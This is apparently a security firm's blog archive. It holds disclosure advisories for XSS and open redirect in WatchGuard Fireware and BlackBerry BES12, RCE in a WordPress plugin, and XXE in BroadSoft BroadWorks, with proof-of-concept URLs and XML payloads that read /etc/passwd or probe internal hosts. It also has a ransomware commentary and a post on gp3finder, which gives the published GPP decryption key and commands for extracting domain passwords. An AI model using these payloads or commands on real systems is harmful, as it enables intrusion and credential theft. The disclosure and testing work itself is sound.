Sec-1 Advisory: Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11

Sec-1 Security Advisory
Severity : Medium
Advisory Name : Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11
Discovery Date : 27/04/2016
Release Date : 11/07/2016
Application : WatchGuard Fireware version 11.11 and earlier
Platform : Windows
CVE : CVE-2016-6154
Discovered by : Ryan Ward
Vendor Status : Resolved in v11.11.1 Fireware Update available from: https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_11_1/index.html#Fireware/en-US/EN_Release_Notes_Fireware.html
Website : http://www.sec-1.com/blog
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6154
http://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_11_1/Fireware_Release-Notes_v11_11_1.pdf

Vulnerability Summary

Reflected Cross-Site-Scripting (Reflected XSS) and Open Redirection

Cross-Site-Scripting (XSS) is a vulnerability that occurs when user entered data is accepted by the server and returned in a response to the user without proper sanitisation, which allows an attacker to embed malicious scripts within a request which is later served to another user. Reflected XSS occurs when the malicious data is immediately returned in a response to a malicious request, whereas Stored XSS occurs when the malicious data is held by the application for some time before being embedded in a response (such as being stored in a database and then retrieved at a later date).

Open redirection vulnerabilities occur when an application incorporates user controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users.

Exploit

A single parameter on the SSL-VPN authentication applet of WatchGuard firewalls running Fireware < v11.11.1 were found to be vulnerable to both Reflected Cross-Site Scripting (XSS) and Open Redirection. This would allow an attacker to launch XSS attacks against targeted users by sending them crafted links (for example, by sending a malicious link in a targeted email). The effects could, for example, include:

  • Stealing access credentials from a targeted user as that user logs in
  • Stealing an access token from a targeted user as that user logs in
  • Displaying a malicious or political message to the user (virtual defacement)

Example Payload/POC
The vulnerability can be reproduced by browsing to “success.html?redirect=javascript:alert(document.domain)” on the SSL-VPN port (4100 by default) on any affected WatchGuard.

https://Firewall_IP:4100/success.html?redirect=javascript:alert(“Sec-1”)

watchg

The same parameter was also found to be vulnerable to an open redirect. https://Firewall_IP:4100/success.html?redirect=http://www.sec-1.com would redirect the users browser to the Sec-1 homepage.

Vendor Response


As of Fireware 11.11.1 this vulnerability has been reported as being fixed by WatchGuard. Sec-1 would like to thank WatchGuard for their prompt and professional response.

Posted in Advisories | Comments Off on Sec-1 Advisory: Reflected Cross-Site Scripting and Open Redirect in WatchGuard Fireware v11.11

Sec-1 Advisory: Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4

Sec-1 Security Advisory
Severity : Medium
Advisory Name : Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4
Discovery Date : 23/02/2016
Release Date : 12/04/2016
Application : BES12 version 12.4 and earlier
Platform : Windows
CVE : CVE-2016-1917
CVE-2016-1918
Discovered by : Nicodemo Gawronski
Vendor Status : Resolved in April 2016 Blackberry Update available from http://web.blackberry.com/support/business/bes-support/bes-support-downloads.html
Website : http://www.sec-1.com/blog
http://support.blackberry.com/kb/articleDetail?articleNumber=000038118
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1917
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1918

Vulnerability Summary

Reflected Cross-Site-Scripting (Reflected XSS)

Two instances of Reflected Cross-Site-Scripting were discovered on the affected software.
Cross-Site-Scripting (XSS) is a vulnerability that occurs when user entered data is accepted by the server and returned in a response to the user without proper sanitisation, which allows an attacker to embed malicious scripts within a request which is later served to another user. Reflected XSS occurs when the malicious data is immediately returned in a response to a malicious request, whereas Stored XSS occurs when the malicious data is held by the application for some time before being embedded in a response (such as being stored in a database and then retrieved at a later date).

Exploit

Two parameters on the “admin/settings/redirect.do” and “admin/user/userDetails.do” of the BES12 web server were found to be vulnerable to Reflected Cross-Site Scripting (XSS).
This would allow an attacker to launch XSS attacks against targeted users by sending them crafted links (for example, by sending a malicious link in a targeted email). The effects could, for example, include:

  • Stealing access credentials from a targeted user as that user logs in
  • Stealing an access token from a targeted user as that user logs in
  • Displaying a malicious or political message to the user

Example Payload/POC

Steps to reproduce the vulnerability:

  1. Log in to the BES12 Server.
  2. Access the following URLs:
https://BES12_Server_IP/admin/settings/redirect.do?settingUrl=%22-alert%28document.domain%29-%22
Reflected XSS in "/admin/settings/Redirect.do"

Reflected XSS in “/admin/settings/Redirect.do”

https://BES12_Server_IP/admin/user/userDetails.do?userId=3&backLocation=usergrid”);alert(1);//&suppressLoginWizard=true&gridHandleId=50896ee8-f282-4713-b54d-33f7725099fb
Reflected XSS BES12 "/admin/user/Userdetails.do"

Reflected XSS in “/admin/user/Userdetails.do”

This is a simplistic payload which will simply display a pop up message warning the users that the page is vulnerable; however a more advanced payload could easily be generated to perform actions as discussed above.

Vendor Response

The vendor has patched the XSS issues in the April 2016 Software Update. Sec-1 would like to thank Blackberry for their prompt and professional response.

Posted in Advisories | Comments Off on Sec-1 Advisory: Reflected Cross-Site-Scripting in Blackberry BES12 version 12.4

Critical: Remote Command Execution in WordPress Form Manager Plugin (CVE-2015-7806)

Sec-1 Security Advisory
Advisory Name : Critical: Remote Command Execution in WordPress Form Manager Plugin
Discovery Date : 09/10/2015
Release Date : 12/10/2015
Application :
Platform : WordPress
Severity : HIGH.Arbitrary Code Execution
CVE : CVE-2015-7806
Discovered by : Nick Blundel
Vendor Status : Resolved on 12th October via an update to the plugin version 1.7.3
Website : https://wordpress.org/plugins/wordpress-form-manager/

Vulnerability Summary


On the 9th October 2015 researchers at Sec-1 (AppCheck NG Team) discovered a critical Remote Command Execution (RCE) in the popular WordPress plugin Form Manager which allows an attacker with an unprivileged account (including a self-registered account) to execute arbitrary commands on the host. The vulnerability was reported and fixed on the 12th October.

Demonstration Video


See details and a demonstration of the vulnerability here.

Solution


The vulnerability has now been resolved by the developer: please upgrade this module to >= 1.7.3

Exploit

Here is an example exploit script for this vulnerability: wp-forms-manager-CVE-2015-7806.py

Posted in Advisories | Comments Off on Critical: Remote Command Execution in WordPress Form Manager Plugin (CVE-2015-7806)

Sec-1 Advisory: BroadSoft BroadWorks XSP XML External Entity Injection

Sec-1 Security Advisory
Advisory Name : XML External Entity Injection in BroadWorks XSP XML Interface
Discovery Date : 23/03/2015
Release Date : 02/06/2015
Application : BroadWorks XSP XML Interface 17.0 XML Interface on TCP/8011
Platform : Linux
Severity : HIGH.Arbitrary File Retrieval
CVE : CVE-2015-4120
Discovered by : Jordan Carter
Holly Williams
Vendor Status : Resolved in May 2015 BroadWorks Update available from http://xchange.broadsoft.com/
Website : http://www.sec-1.com/blog
http://www.broadsoft.com/service-providers/products-applications/broadworks/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-4120

Vulnerability Summary

XML External Entity Injection

An XML external entity injection vulnerability was identified that allows an unauthenticated attacker to read arbitrary files from the server and enumerate internal web applications.
Applications that parse XML input may be vulnerable to security issues around XML External Entities. Many parsers are often vulnerable by default unless a developer takes deliberate steps to remove the vulnerability.
If a parser allows external entities to be defined and then called by an attacker this may allow an attacker to read arbitrary files, load content from applications that are only intended to be accessed internally, and potentially allow the attacker to perform a denial of service against the application server. In very rare cases XXE can lead to remote command execution.

Exploit

When a specially crafted payload is supplied to the affected application listening on port TCP/8011 the server parses the supplied content as valid XML. This can be leveraged to read arbitrary server side files and communicate with internal network components.

Example Payload

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert[ <!ENTITY c SYSTEM "file:///etc/passwd">]><xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0"><requestId>&c;</requestId><period>30</period></xsp:keepalive>


The above payload can be transmitted with free publically available tools, such as telnet and will result in a vulnerable server responding with the contents of the local /etc/passwd file. An attacker that is able to enumerate the location of sensitive files, such as configuration files, could gain unauthorised access to data such as system credentials. Additionally it should be noted that remote internal systems, that are generally not accessible to the attacker, could be targeted with payloads such as:


<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE convert[ <!ENTITY c SYSTEM "http://10.50.1.1:80/">]><xsp:keepalive xmlns:xsp="http://schema.broadsoft.com/XspXMLInterface" version="17.0"><requestId>&c;</requestId><period>30</period></xsp:keepalive>


This will request the content from a web-server residing at 10.50.1.1 on port 80. A payload such as this could allow an attacker to enumerate internal web applications, potentially gain access to confidential data and conduct attacks on internal systems such as error based SQL injection. Potentially leading to further network compromise.

Vendor Response


The vendor has patched the XXE Injection issues in the May 2015 BroadWorks update. Sec-1 would like to thank BroadSoft for their prompt and professional response.

Additional CVE Details


The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.
CVE : CVE-2015-4120 : Assigned to the XML External Entity (XXE) discovery. Assigned Bug ID# TAC-129144 by BroadSoft.
Copyright 2015 Sec-1 LTD. All rights reserved.

Posted in Advisories | Comments Off on Sec-1 Advisory: BroadSoft BroadWorks XSP XML External Entity Injection

Novel malvertising attack leads to drive by ransomware

Today Kaspersky issued a Threatpost: https://threatpost.com/malvertising-leads-to-magnitude-exploit-kit-ransomware-infection/112894 regarding the evolving malvertising and ransomware threat.

It can be incredibly distuptive, costly, and in some cases devastating in its consequences so we at Sec-1 Ltd have taken a look at what it means in terms of: – is there anything about this news that is surprising, unique or novel? – what is the real threat from this? – how should users and organisations respond?

Taking a look at the ThreatPost article we didn’t find this surprising at all; it’s reminiscent of another article (http://www.informationweek.com/partner-perspectives/bitdefender/malvertising-5-lessons-for-companies-and-employees/a/d-id/1318190​) posted in 2014 referencing attacks from 2012.

Exploitation toolkits give attackers an easy method of deploying malicious payloads to victims to allow a large degree of control over their machines. Couple that with the fact that ​ransomware has been proven to be profitable to criminals. Add this to the fact that malvertising is an effective method of hitting a large and varied number of potential victims and it’s unsurprising that they are continuing to utilise these tactics. Given its profitability ransomware has evolved, as has been the case with malware trends for the past 2 decades, into ‘toolkits’. These toolkits allow the chaining of exploitation and evasion tactics allowing them to get around traditional security defences such as anti-virus and firewalls. The usual tactics of ‘script src=’ or hidden iframes are well known techniques for issuing a browser redirection for malvertising – this 302 ‘cushioning’ (what seems to be essentially 302 redirects over iframes) is a new technique – and when coupled with domain shadowing, also used by this toolkit, can lead to an effective compromise of a target.

The real threat here to end-users is the potential impact of the ransomware payloads. Regardless of how they are delivered if users are hit with ransomware they risk losing all of their data: – that includes all of those family photos stored on your laptop, or that assignment you’re working on for university. The files that each user has that they consider critical differs greatly, but all users have something on their machines that would be a terrible loss to them if they couldn’t access it. That’s what ransomware does, it encrypts your harddisk and denies you access to your files until you pay the ransom.

Generally speaking, exploitation toolkits do not deploy “Zero day exploits” but utilise well known payloads, in this case a payload from 2013. This means that not all hope is lost for end users are there are steps, to back up the tried and tested “defence in depth” policy, they can take to ensure they are protected:

Patch as soon as you can!

Configure your computer to automatically install updates for both your web browser and your operating system. The challenge here is not to wait until day 30 of the “accepted” window for applying patches but to do it closer to the day the patch is released. In this example the ransomware was launched well before the patches are commonly applied – as such, the threat is more immediate, especially given our natural inclination to click on a link in an email or other communication, without necessarily having done our background checking for the link’s validity.

Back-ups and Separation of Storage

Backup important data on external hard disks that are not usually connected to your machine. If the disk isn’t connected then the malware can’t encrypt it and deny access! Backup regularly.

Update your antivirus, regularly!

The URL in the Email won’t be the only route to what you want if its legitimate

Employ good practices when receiving email, if it’s asking to you to “click” think twice before you do! In the corporate world there are many more ways to apply controls using Digital Signing of emails, broad scale and regular awareness training programs that engender good habits of not clicking on malware links and help enforce corporate policy. Given the rise in Advanced Persistent Threats this clearly has benefits wider than just holding sensitive data to ransom.

Stop and think before you Click

The reality is that phishing emails and malvertising are looking to exploit our trust in brands so that we just click, resulting in us walking into these types of attack. There is a simple way of avoiding these attacks simply by using the more formal way of arriving at the same information. If you like what the malvertisment is offering then use a search engine to find the destination rather than click the advert. In the same way as in email, if amazon or ebay are emailing you there will be an email in the message board withtin their application. Rather than follow the link in the email, login to the application and find a different route to the same info.

Other links…

SC Magazine – Novel malvertising attack leads to drive by ransomware

 

Posted in News | Tagged , , | Comments Off on Novel malvertising attack leads to drive by ransomware

Tool: Group Policy Passwords Exploit Tool – gp3finder

Group Policy preferences were introduced by Microsoft in Windows 2008 allowing administrators to configure unmanaged settings (settings which the user can change) from a centrally managed location – Group Policy Objects (GPO) [1].

Among the preference items configurable through Group Policy preferences are several that can contain credentials: Local Groups and User Accounts, Drive Mappings, Schedule Tasks, Services, and Data Sources.

These credentials are stored within the preference item in SYSVOL in the GPO containing that preference item. In order to obscure the password from casual users it is encrypted in the XML file of the preference item [2]. However anyone who gains access to SYSVOL can decrypt the passwords because Microsoft published the Advanced Encryption Standard (AES) encryption key [1]:

4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b

Microsoft addressed this issue in MS14-025 [4] however this update only prevented the creation of new Group Policy Preference items containing credentials; it did not remove any existing instances as this was considered too disruptive. Therefore network administrators must take action to find and remove these vulnerable items.

Several tools exist to exploit this vulnerability including:

Get-GPPPassword (PowerShell – http://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html)

gpp (Metasploit Post Module – http://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp)

gpprefdecrypt.py (Python – http://esec-pentest.sogeti.com/public/files/gpprefdecrypt.py)

gpp-decrypt-string.rb (Ruby – http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html)

However each of these existing tools have a significant weakness. Get-GPPPassword must be run from a Windows machine, the gpp Metasploit post module requires a meterpreter session, gpprefdecrypt.py and gpp-decrypt-string.rb require you to manually extract the cpassword for decryption, and finally the version of gpprefdecrypt.py available for download no longer works at the time of writing (due to an update to PyCrypto that removed the default Initialisation Vector (IV) of 16 bytes of zeros).

Sec-1 Penetration Tester Oliver Morton therefore wrote a new cross platform tool, dubbed GP3Finder (Group Policy Preference Password Finder), to automate the process of finding, extracting and decrypting passwords stored in Group Policy preference items. This tool is written in Python (2.7) and depends on PyCrypto and PyWin32 on Windows or subprocesses on *nix based operating systems.

GP3Finder has been released open source under the GPL2 license here and a compiled executable for Windows is also available here.

Update v4.0

On a recent test, Oliver had compromised a single Windows host and had remote desktop access as a low privilege user. Since he couldn’t map the C$ share remotely, and didn’t want to search through the dozens of Group Policy Preference items using built in Windows utilities, he quickly added the required functionality to gp3finder instead.

Note: Group Policy Preferences are cached locally under the (hidden) directory: “C:\ProgramData\Microsoft\Group Policy\History\” by default.

In this update the option to specify the start path when searching a remote share was added. This allows you to quickly search for Group Policy Preference passwords when you have access to the C$ share without searching the entire drive.

Another significant change is that you can now specify multiple hosts to search – ideal if you have access to C$ on a number of hosts and want to check all of them. Note, this functionality is not threaded (yet) so can take some time to complete.

Finally some of the command line options have been changed to ensure they are as intuitive as possible (see below or –help).

Example Usage

Decrypt a given cpassword:

gp3finder.py -D CPASSWORD

The following commands output decrypted cpasswords (from Groups.xml etc) and list of xml files that contain the word ‘password’ (for manual review) to a file (‘gp3finder.out’ by default, this can be changed with -o FILE).

Find and decrypt cpasswords on domain controller automatically:

gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAIN\USER
 Password: PASSWORD

Maps DOMAIN_CONTROLLER’s sysvol share with given credentials.

Find and decrypt cpasswords on the local machine automatically:

gp3finder.py -A -l

Searches through “C:\ProgramData\Microsoft\Group Policy\History” (by default) this can be changed with -lr PATH

Find and decrypt cpasswords on a remote host:

gp3finder.py -A -t HOST -u DOMAIN\USER -s C$ -rr "ProgramData\Microsoft\Group Policy\History"

Find and decrypt cpasswords on hosts specified in a file (one per line):

gp3finder.py -A -f HOST_FILE -u DOMAIN\USER -s C$ -rr "ProgramData\Microsoft\Group Policy\History"

Note: the user this script is run as must have permission to map/mount shares if running against a remote host.

Additional options are available:

gp3finder.py --help

References

[1] [Online]. Available: http://www.microsoft.com/en-us/download/details.aspx?id=24449.
[2] [Online]. Available: http://blogs.technet.com/b/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx.
[3] [Online]. Available: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx.
[4] [Online]. Available: http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx.

Posted in Tools | Comments Off on Tool: Group Policy Passwords Exploit Tool – gp3finder